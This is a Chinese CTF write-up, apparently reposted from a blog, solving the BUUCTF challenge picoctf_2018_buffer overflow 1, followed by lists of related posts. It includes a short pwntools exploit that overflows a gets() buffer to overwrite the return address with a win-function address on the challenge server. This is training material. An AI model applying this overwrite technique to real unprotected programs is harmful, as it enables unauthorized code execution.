[BUUCTF]PWN——picoctf_2018_buffer overflow 1

其他 2021-04-02 21:03:51 阅读次数: 0

picoctf_2018_buffer overflow 1

例行检查，32位，没开启保护
在这里插入图片描述
运行一下

用IDA打开，检索字符串，看到了flag.txt，跟进找到了调用flag.txt的函数

win_addr=0x80485CB

gets函数读入，存在溢出漏洞，覆盖ret为win函数即可

from pwn import*

r=remote('node3.buuoj.cn',26185)
win_addr=0x80485CB	

payload='a'*(0x28+4)+p32(win_addr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/BangSen1/article/details/115028160

[BUUCTF]PWN——picoctf_2018_buffer overflow 1

[BUUCTF]PWN——picoctf_2018_buffer overflow 0

[BUUCTF]PWN——picoctf_2018_buffer overflow 2

picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap

picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]

pwn int_overflow

Buffer Overflow Demo

Buffer Overflow之argv

*** buffer overflow detected ***异常

overflow

Buuctf(pwn) picoctf_2018_rop chain 栈溢出

buuctf pwn（1~4）

18.9.16 PWN2----Stack Overflow

LeetCode 报错解决 heap-buffer-overflow Heap-use-after-free Stack-buffer-overflow Global-buffer-overflow

heap-buffer-overflow on address堆溢出

缓冲区溢出(Buffer Overflow)

PWN-整型溢出-攻防世界-PWN-int_overflow

【BUUCTF - PWN】pwn1_sctf_2016

南京邮电大学CTF-PWN-Stack Overflow

攻防世界_pwn int_overflow(萌新版)

Predicting buffer overflow using semi-supervised learning

缓冲区溢出（buffer overflow）避免方法

【信息安全-科软课程】Lab4 Buffer Overflow

Buffer Overflow缓冲区溢出和保护措施

[BUUCTF]PWN——picoctf_2018_are you root（程序逻辑错误）

[BUUCTF]PWN——picoctf_2018_leak_me（puts的‘\x00’绕过输出敏感数据）

Tishreen-CPC 2018 G. Colors Overflow

buuctf@pwn1_sctf_2016

buuctf pwn wp---part1

【BUUCTF - PWN】ciscn_2019_n_1

今日推荐

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

周排行

Family Tree 题解

BZOJ 1093 最大半连通子图 SCC + DP

幂等处理

Spring----学习（2）----XML 配置Bean 自动装配

SQL Server 远程更新目标表数据

HIbernate3.6 环境搭建

特殊符号正则表达式

【Linux】第一章进程的理解

843. n-皇后问题（dfs+输出各种情况）

空间数据库2

每日归档

更多

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)